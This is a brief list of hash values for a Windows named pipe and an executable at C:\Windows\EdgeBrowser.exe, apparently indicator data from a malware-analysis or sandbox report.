SHA256 37db478cd1a50883e179c601987b3a5171823aaa9d04063817fa7af57723ffb7
SHA512 762989d2993cc2431b50ae9a2847cc3b16bce41c15da9a974dd90c66884ac28b32698edbf9d13b948d7b1f22919278b43e4448710dda2b2489b509bd6ecf00c7

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Windows\EdgeBrowser.exe

MD5 f37b599f4ae7813f692e84cd3b1aab00
SHA1 483fd68331c8f8c041009910b84684d7a3ade7d0
SHA256 26ed609c405174081e7c23ed3b91bd3585a21975a8ec231d16d5635f0ae7039e
SHA512 006e98deba2a746203e6f14aed30a1fbfab5689a727904a08b19dbc3c9e14882e9d7bde0342bd3b8279f77fe87cc2f2fd926e796d2125322916236eb42ba8171